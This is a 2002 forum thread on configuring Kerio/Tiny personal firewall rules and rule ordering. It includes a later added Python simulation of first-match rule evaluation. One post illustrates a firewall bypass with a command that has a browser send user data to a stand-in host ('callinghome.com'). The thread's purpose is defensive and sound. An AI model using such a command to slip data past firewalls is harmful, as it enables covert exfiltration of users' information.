Forums » The Site » Old Forums » Kerio - Tiny Support » Just one example of rules

BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL


 Just one example of rules

The goal of this is to give you one example of how to configure your rules for normal usage.

DHCP
If you're on 56k dial-up, or on a static configuration, you don't need these two rules. Please see the FAQ on how to configure them securely if you do need them.
FAQ »Security »How do I allow DHCP?
FAQ »Security »Trick: Make Kerio find my ISP's DHCP server for me...

DNS
I chose to use the custom address group for my dns since I have multiple providers, and that forces you to make many rules to cover just one area. I also share the range with one icmp rule so it makes that easier too....
FAQ »Security »What is a custom address range?

Normally you make two rules, one for each DNS server, and some configurations only have one, if you're using a routed configuration for example.
FAQ »Security »How do I allow DNS?

ICMP
Here's a link to help configure ICMP to your needs, and I suggest you make a toggle rule to make yourself pingable when you need to be. You might even go as far as to make two rules for certain sites to be able to ping you anytime, like DSLR/BBR's line monitoring.
POST »Example ICMP rules

IGMP
A protocol used for the LAN, and most people do not need to accept it. If you need to, you can easily restrict it to which sites you must accept it from.

Loopback
Here I have two loopback rules for example only, one for a normal configuration, and the other if you're using any kind of program that uses your localhost as a proxy. If the default loopback rule is used with a software proxy you can't control which programs can get out through the proxy, and that means they can bypass your firewall. So for software proxy users, you need to use the UDP loopback rule only.
POST »Simple loopback solution for software proxy users

XP Services Block (Custom to my config)
I use XP, and there are services I can't shutdown that are listening all the time so I made a rule to make sure that any packets to those ports are blocked.

IE
It's a very good idea to restrict ports, but the only problem here is you will be prompted for sites that use non-default ports, along with FTP communications.... I prefer it this way since I do not trust IE to have free access to the higher port ranges. If necessary you can add ports to the list that are frequently used, like 8080 if you use a remote proxy, etc...

It's a very bad idea, but if you don't want to be prompted for any of IE's outbound actions you would have to allow it outbound on any TCP port only.

Outlook/OE
If you use the standard mail/news servers, this config is what you're looking for. If you use the IMAP mail service, just add that port to the list after you're prompted for it.

The only problem here is mail like hotmail, and images that are linked to in your mail like webbugs. Those will not work, but that is for your protection. If you open the message, and their webbug loads...... You have just verified your e-mail address!

WMP
It's restricted to the two ports used to open media from the net, and the second rule is disabled till I need it, when I listen to streaming services that actually require I enable this rule.

The last rule..
My block all inbound blocks what is not already being permitted, but the fact is that Tiny/Kerio will block packets to non-listening ports anyway so you shouldn't see much action with the rule disabled. I prefer to keep it disabled, but I can enable it whenever I want.

It's inbound only since I want to be prompted for any new outbound communications not already permitted.

PLEASE don't post your rules asking for help with them, or questions about anything other than these rules. In these cases please start your own thread so people can help you with your ruleset since every ruleset is different.
--
When you don't listen to the White Hats, you eventually figure out you just made another Grey/Black Hat turn against you.... - BlitzenZeus

[text was edited by author 2002-03-30 16:47:26]


Skipdawg
The Original
Premium,ExMod 2001-03
join:2001-04-19
The Void
  That is looking very good. Thanks for sharing that with us.
--
Proud United States Navy Veteran.


gwion
wild colonial boy
Premium,ExMod 2001-08
join:2000-12-28
Pittsburgh, PA

reply to BlitzenZeus
Well done. Thanks, indeed. I hope nobody minds if I ask that we do keep this thread aimed at example rule sets, maybe even try to deliberately create an archive thread that can be used as a reference, and a potential source for new FAQ material? I can preview a few of the newer FAQ screenshots, here, too. Thanks BlitzenZeus...
--
Aye, sun and moon and star, all,
And further add to that
That, being dead, we rise,
Dream and so create
Translunar paradise.


BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL


The above is a generic adaptation from my current rules, and is extremely edited...

My current rules are much more complex, and I have deleted/edited many of the rules for the above example to be generic enough so they would not be special to my config. So any examples submitted should be generic in nature.

We have all seen how generic the default rules are, so what we need to explain is how to use the complex configuration we're offering so a person starting out can understand them, and provide links when necessary.

Edit: Even my last example I was using is extremely edited from my current ruleset...
--
When you don't listen to the White Hats, you eventually figure out you just made another Grey/Black Hat turn against you.... - BlitzenZeus

[text was edited by author 2002-03-30 19:27:12]


Sentinel
Premium
join:2001-02-07
Florida
 reply to BlitzenZeus
Yes. Very nice blitz! This will help a lot of new users.
--
AL


pompeyfan
Premium
join:2001-12-25
Australia

reply to BlitzenZeus
That's a great starting point for new users. Is it worth giving them suggested rules for other commonly used software such as antivirus software, Ad-aware, whois software, etc., or do you think people should just be encouraged to use the rule assistant to shape these rules?
--
Pompey Rock, Saints suck


BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL


reply to BlitzenZeus
Amendment

The 'XP TCP Services Block rule (log)' is mislabeled due to user error. Most of the XP services are TCP, but a couple are UDP. The rule also shows it's blocking both protocols, so the rule should be renamed 'XP Services Block (log)'...

Also note the change in the loopback example here. The first UDP rule is always active, and you only enable the second TCP loopback rule if you're not using a software proxy.
--
When you don't listen to the White Hats, you eventually figure out you just made another Grey/Black Hat turn against you.... - BlitzenZeus

[text was edited by author 2002-04-04 18:55:08]


hpguru
Curb Your Dogma
Premium
join:2002-04-12

reply to BlitzenZeus
Re: Just one example of rules

Your localhost loopback rules, aside from being unnecessarily restrictive (localhost communications are benign), don't offer any protection against unauthorized applications using your software proxy. They do stop access to the proxy if the second localhost rule is disabled, but when it is enabled, any application that uses IE's connection settings will be able to connect out via your proxy unimpeded by your firewall. A proxy is a firewall tunnel after all.

I have 4 loopback rules (see the attachment) but for most folks using a software proxy, 2 will do just fine.

The first loopback rule implicitly permits TCP/UDP from any localhost port to any localhost port in the range from 1 to 79. Interprocess communications on the local machine aren't likely to use that port range but if used it will be unimpeded and so I won't suffer from mysterious crashes and/or errors resulting from blocking the proper functioning of my system.

The second loopback rule simply logs TCP connections to localhost:80 where eDexter an ad blocker listens. If you do not use eDexter then set the "remote" range of the first rule to 1-8079 (if your proxy listens on localhost:8080, otherwise the end point would be Your_Proxy_Port-1).

The third rule implicitly permits TCP/UDP from any localhost port to any localhost port in the range from 81 to 8079, where most localhost activity lives. If you do not use eDexter you can eliminate this rule.

The fourth rule implicitly permits TCP/UDP from any localhost port to any localhost port in the range from 8081 to 65535. If you are not using eDexter this would be your second loopback rule.

Now please note the absence of any rule allowing implicit access to localhost:8080, where the proxy listens. Without such a rule no application that uses IE's proxy settings will be able to connect out via the proxy unless you explicitly permit it to do so. You'll also note that the "PROXY" rules defined for my 3 browsers only permit TCP connections to a single address and a single port, localhost:8080.

These rules aren't perfect but when it comes to security there is no such animal. These rules will not stop an app from connecting out via your default browser. One simple way of accomplishing this would be for a rogue app to execute a command line such as

iexplore callinghome.com/x=your-data-goes-here&gotcha

Firewalls cannot stop that if the browser is permitted access, but I use Proxomitron and a couple of filters to one, restrict access to all but a few sites when I'm not actively searching the web and two, to prevent certain data from leaving my computer via the proxy. I don't want to stay off topic so I won't get into that but it is a very secure setup and I would encourage anybody using a local proxy such as Proxomitron to follow suit.

Just my 2 cents.


BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL

Hi hpguru

You have to read the example rules, their captions, and all the information/links I provide below. Please keep in mind this example is for beginners...

Even though user error came into play to duplicate udp again in the correction, the caption was "No Software Proxy". So it was already pointed out, and above in the first post there was a link that lead to more information about proxy configurations.

These rules are only a start if the person is looking for some guidance. That is why I have many links to the FAQ's, and a few referenced posts.

You do have an interesting method of using the loopback to control, but most of all your rules look like a good example of how to control your programs with a software proxy. They should be helpful for some people looking to configure their system for a proxy, and are looking at the different possible configurations.
--
If con is the opposite of pro, is Congress the opposite of progress? - George Carlin


hpguru
Curb Your Dogma
Premium
join:2002-04-12

reply to BlitzenZeus
Well I must admit I didn't follow all of your links. I've got about 25% packet loss trying to connect here so it's a little on the slow side. As usual, your advice is sound.

As you can see I've made the switch to Kerio out of concerns for the aging technologies employed by ConSeal and AtGuard. I feel protected, but I hate Kerio's log with a passion. Too hard on the eyes. Even so I think Kerio and Prox make a good combo.


BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL

Yeah, Kerio and Proxo are both free while providing excellent security when configured correctly.

This is getting a bit off-topic now, and I'm trying to keep this particular thread on topic. However I'll end this with a suggestion since it's hard for you to read the logs...

There is always opening the log file in your favorite text editor(notepad), or Tiny Log Viewer which is customizable:
»hem.passagen.se/pluppis/dator_eg···ram.html
--
If con is the opposite of pro, is Congress the opposite of progress? - George Carlin


gwion
wild colonial boy
Premium,ExMod 2001-08
join:2000-12-28
Pittsburgh, PA

reply to BlitzenZeus
Again, this thread is developing very useful overtones. Thanks for contributing, hpguru, and welcome aboard. Again, I'll remind everyone, let's keep this thread as a repository for working rules and suggestions/FAQ potential material... great job. Anyone needing help with rules, or an analysis of a ruleset, please start a new thread, so you can have the attention you deserve. We'll keep this as a "rule bank," where various approaches and techniques can be posted for reference... thanks, again...
--
I haven't a particle of confidence in a man who has no redeeming petty vices.
- Mark Twain, a Biography

LuckiSm0kez

join:2001-08-28
Mountain View, CA

reply to BlitzenZeus
I found that the ICMP blocking rule interfered with one of my applications. I solved the problem by moving the ICMP blocking rule to the end of the list. Without getting into the specifics of my situation, can you comment about where to place application rules within your rule set and the best way to deal with conflicts between a general rule and an application. For example, I could also have split my application rule into two rules and just moved the application rule pertaining to ICMP packets above the blocking rule.


gwion
wild colonial boy
Premium,ExMod 2001-08
join:2000-12-28
Pittsburgh, PA

reply to BlitzenZeus
Remember the parsing model of the firewall, process until match is found, apply the matching rule, and STOP DEAD. Nothing below it is processed. Multiple rules is a means of implementing conditional loops in this firewall, and there's no "right" order, in a generic sense, long as it works. Make a flow chart, if that helps... every node will have exactly two possible paths, "matched," which will ALWAYS lead to a dead end, "apply this rule and quit processing", or "not matched", which will flow to the next rule... make sense?

generally, I organize my own rules something... roughly... like this:

- LAN rules and local network compatibility
- DNS/DHCP/general connectivity
- ICMP
- any needed "bunkering" rules for proxies, etc.
- a general loopback rule, if desired.
- application rules
---first, apps that may need an inbound connect
---next, a rule blocking and logging all inbounds.
---finally, all apps that require only an outbound connection.
- a final "kill all" for unattended operation.

But ordering isn't a matter of convenience or readability, it's the order the firewall will process in... if a rule ABOVE your rule is applied to your traffic, the rules below it are never parsed. So you have to use your judgement, and do a little logic work... simple binary 0/1, false/true thinking is applied... if you can look at a rule and a certain traffic type and say "true", that rule gets applied... doesn't matter WHAT you put UNDER it; that packet's already processed... Elvis leaves the building just as soon as the firewall can say "true" to any rule it hits...
--
We have not the reverent feeling for the rainbow that the savage has, because we know how it is made. We have lost as much as we gained by prying into that matter.- A Tramp Abroad
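Since everything in this thread rests on that one rule, the list is walked top-down and the first match wins, here is an added example that simulates the walk in Python. It is not Kerio code and not any poster's actual ruleset; it models two of the rulesets discussed above: hpguru's split loopback ranges, which leave localhost:8080 unmatched for everything except a named browser, and the ICMP allow/block ordering LuckiSm0kez ran into. The rule and packet fields, the process names, the 8080 proxy port and the 192.0.2.10 monitoring address are assumptions for illustration; real Kerio rules carry more fields (local port, time window, logging) that are not modelled.

```python
"""First-match firewall rule walk, demonstrated on two rulesets from this thread.

Added example for this page; it is not Kerio code and not any poster's ruleset.
Field names, the process names and the monitoring address are assumptions.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

LOCALHOST = "127.0.0.1"
PROXY_PORT = 8080            # the local proxy port hpguru describes (assumed)
MONITOR_IP = "192.0.2.10"    # constructed stand-in for a line-monitoring host


@dataclass(frozen=True)
class Packet:
    proto: str            # "tcp", "udp" or "icmp"
    direction: str        # "in" or "out"
    app: Optional[str]    # owning process; None for ICMP, which the firewall does not tie to an app
    remote_ip: str
    remote_port: int      # 0 for ICMP


@dataclass(frozen=True)
class Rule:
    name: str
    action: str                              # "permit" or "deny"
    proto: str = "any"
    direction: str = "any"
    app: Optional[str] = None                # None: system rule, matches every application
    remote_ip: Optional[str] = None          # None: any remote address
    ports: Tuple[Tuple[int, int], ...] = ()  # inclusive (lo, hi) ranges; empty: any port
    enabled: bool = True

    def matches(self, p: Packet) -> bool:
        if not self.enabled:
            return False
        if self.proto != "any" and self.proto != p.proto:
            return False
        if self.direction != "any" and self.direction != p.direction:
            return False
        if self.app is not None and self.app != p.app:
            return False
        if self.remote_ip is not None and self.remote_ip != p.remote_ip:
            return False
        if self.ports and not any(lo <= p.remote_port <= hi for lo, hi in self.ports):
            return False
        return True


def evaluate(rules: List[Rule], p: Packet, default: str = "ask") -> Tuple[str, Optional[str]]:
    """Walk the list top-down. The first matching rule decides and nothing
    below it is consulted; with no match Kerio would prompt, modelled as "ask"."""
    for rule in rules:
        if rule.matches(p):
            return rule.action, rule.name
    return default, None


def trace(rules: List[Rule], p: Packet) -> List[str]:
    """Names of the rules actually consulted, in order, up to and including the match."""
    seen = []
    for rule in rules:
        seen.append(rule.name)
        if rule.matches(p):
            break
    return seen


def loopback_ruleset() -> List[Rule]:
    """hpguru's layout: permit every localhost port range except the proxy port, then
    hand the proxy port only to a named browser (the eDexter log rule on :80 is omitted)."""
    return [
        Rule("Loopback 1-79", "permit", remote_ip=LOCALHOST, ports=((1, 79),)),
        Rule("Loopback 81-8079", "permit", remote_ip=LOCALHOST, ports=((81, 8079),)),
        Rule("Loopback 8081-65535", "permit", remote_ip=LOCALHOST, ports=((8081, 65535),)),
        Rule("PROXY iexplore", "permit", proto="tcp", app="iexplore.exe",
             remote_ip=LOCALHOST, ports=((PROXY_PORT, PROXY_PORT),)),
    ]


def icmp_ruleset(allow_first: bool) -> List[Rule]:
    """The ordering LuckiSm0kez hit: an ICMP allow placed below a blanket ICMP block never fires."""
    allow = Rule("Permit ping from monitor", "permit", proto="icmp", direction="in", remote_ip=MONITOR_IP)
    block = Rule("Block all inbound ICMP", "deny", proto="icmp", direction="in")
    return [allow, block] if allow_first else [block, allow]


if __name__ == "__main__":
    browser = Packet("tcp", "out", "iexplore.exe", LOCALHOST, PROXY_PORT)
    rogue = Packet("tcp", "out", "rogue.exe", LOCALHOST, PROXY_PORT)
    for pkt in (browser, rogue):
        print(pkt.app, "->", evaluate(loopback_ruleset(), pkt))
    ping = Packet("icmp", "in", None, MONITOR_IP, 0)
    for order in (False, True):
        rules = icmp_ruleset(allow_first=order)
        print("allow first" if order else "block first", evaluate(rules, ping), trace(rules, ping))
```

Two things the walk makes visible: the rogue process reaching localhost:8080 matches none of the loopback ranges and none of the browser rules, so it falls through to the prompt rather than being silently permitted, which is exactly the gap hpguru left on purpose; and with the block rule above the allow rule, `trace` shows the allow rule is never even consulted, so the only fixes are to move the allow above the block or to split the application rule as LuckiSm0kez did.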


BlitzenZeus
Burnt Out Cynic
Premium,MVM
join:2000-01-13
Beaverton, OR
·Verizon FIOS
·Verizon Online DSL


reply to LuckiSm0kez
-Please start your own thread if you can't figure out this problem yourself with the recent information given...

--In the case of icmp, the allow rules must go before any icmp/"any" protocol non-application blocking rules since icmp is not currently application based. Icmp allow rules can go anywhere in the ruleset except after icmp/"any" protocol non-application blocking rules unless the placement is intentional as most blocking rule are.

--I prefer application rules after the system rules for the obvious reason that you don't have to make these rules again for each application. I make the DNS, DHCP, and Loopback rules first, and proceed with the application rules.

Always consider the cause and effect of every rule...
--Does it block a communication a program needs to allow?
--Does it allow a communications i'm trying to block?
--Will it block communications I need to allow in the future?(If so, make it logging, or toggle it off when you need to.)

If someone has something to add to the thread, ask me, or Gwion(If he's willing..) to review the information before posting it as the goal of this thread is to provide useful example rulesets...
--
If con is the opposite of pro, is Congress the opposite of progress? - George Carlin
[text was edited by author 2002-04-18 18:32:57]


gwion
wild colonial boy
Premium,ExMod 2001-08
join:2000-12-28
Pittsburgh, PA

reply to BlitzenZeus
I'm not sure that wasn't a good entree, though, to some very good info, that it REALLY is important to keep repeating... though I do agree with preserving this as a "developed rules and theory" thread.... and taking the questions to separate threads of their own... not just to keep this one open for samples, but so your question gets the individual attention that gets answers... but there does always remain a MAJOR caveat with this firewall, and I don't hesitate to repeat it over and over (and it applies to almost all ruleset based parsing engines, firewalls, proxies, http server permissions, and whatever, so it's not that Kerio-specific... and the caveat is that the BEST rules put together in the WRONG order are sometimes as bad as the WORST rules. So, indeed, I think any discussion of rules needs to contain a reminder of the "walk the list, in order, until a match is found, apply the match and move to the next job" is critical, in a complete discussion... just so we keep the specific queries about "my ruleset" in their own threads... remember, you aren't going to get a lot of attention from others who might want to help if you post to a "general" thread like this, and then, later, when you or someone else has a similar issue, it won't be as easy to search back for the posts... makes sense to me... carry on, then, ladies and gentlemen.
--
We have not the reverent feeling for the rainbow that the savage has, because we know how it is made. We have lost as much as we gained by prying into that matter.- A Tramp Abroad

LuckiSm0kez

join:2001-08-28
Mountain View, CA

reply to BlitzenZeus
Thanks for the info. I had already solved my problem before posting and was not in need of individual help. My intention was to encourage the dissemination of wisdom that would help beginners who were trying to apply your rule set. My apologies for misunderstanding the intention of this thread, though I personally feel that your response is a valuable contribution to this thread.
over 10 years online! © 1999-2009 dslreports.com.